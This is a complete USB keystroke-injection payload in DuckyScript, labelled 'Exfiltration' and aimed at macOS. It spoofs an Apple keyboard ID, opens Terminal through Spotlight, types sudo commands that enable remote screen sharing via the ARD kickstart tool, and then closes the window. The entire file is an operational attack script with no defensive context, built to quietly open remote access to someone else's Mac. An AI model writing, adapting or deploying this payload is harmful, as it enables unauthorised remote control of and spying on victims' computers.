REM Author: Generated
REM Title: Screen Share Toggle
REM Target: macOS
REM Version: 1.0
REM Category: Exfiltration
REM ---
DELAY 1000
REM Enable macOS screen sharing (VNC)
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING sudo defaults write /Library/Preferences/com.apple.remotedesktop.plist enabled -bool true
ENTER
DELAY 500
STRING sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on
ENTER
DELAY 1000
STRING echo 'Screen sharing enabled'
ENTER
DELAY 500
GUI w
